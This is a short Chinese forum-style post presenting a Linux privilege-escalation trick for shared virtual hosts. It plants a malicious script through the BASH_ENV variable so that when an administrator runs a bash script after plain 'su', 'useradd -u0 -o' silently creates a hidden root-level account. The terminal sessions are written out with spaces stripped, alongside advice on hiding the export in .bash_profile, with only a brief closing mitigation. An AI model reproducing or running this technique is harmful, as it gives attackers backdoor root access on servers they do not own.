虚拟主机linux提权操作适合国外的虚拟主机

一个linux提权用的技巧，放出来攒RP了。OK，通常情况下，我们在执行bash脚本的时候，有一个执行过程，其中有一点比较重要:如果BASH_ENV被设置的话，它就会执行BASH_ENV指向的脚本一个test:

以下是引用片段：[xiaoyu@localdomain~]$echo$BASH_ENV[xiaoyu@localdomain~]$exportBASH_ENV="/tmp/.bashrc"[xiaoyu@localdomain~]$echo$BASH_ENV/tmp/.bashrc[xiaoyu@localdomain~]$cat/tmp/.bashrc#!/bin/bashecho"Hello"[xiaoyu@localdomain~]$ls-l-rwxrwxr-x1xiaoyuxiaoyu-09-:54test.sh

[xiaoyu@localdomain~]$cattest.sh#!/bin/bashecho"kk"[xiaoyu@localdomain~]$./test.shHellokk

啊哦，还在/Article/UploadFiles//41.gif，OK，实验结束，实战：以下是引用片段：[xiaoyu@localdomaintmp]$echo’/usr/sbin/useradd-u0-okk2>/dev/null’>/tmp/.bashrc[xiaoyu@localdomaintmp]$cat/tmp/.bashrc/usr/sbin/useradd-u0-okk2>/dev/null[xiaoyu@localdomaintmp]$grepkk/etc/passwd[xiaoyu@localdomaintmp]$echo$BASH_ENV/tmp/.bashrc[xiaoyu@localdomaintmp]$suPassword:[root@localdomaintmp]#cd/home/xiaoyu[root@localdomainxiaoyu]#./test.shkk[root@localdomainxiaoyu]#grepkk/etc/passwdkk:x:0:503::/home/kk:/bin/bash[root@localdomainxiaoyu]#呵呵，改密码的语句我没加进去哦。自己想，呵呵，偶不知道，偶不知道恩，关于怎么安置，和fakesu一样，在.bash_profile等地方exportBASH_ENV变量。如果要避免这种情况，使用su-登录root，估计没几个管理员记得这个指令吧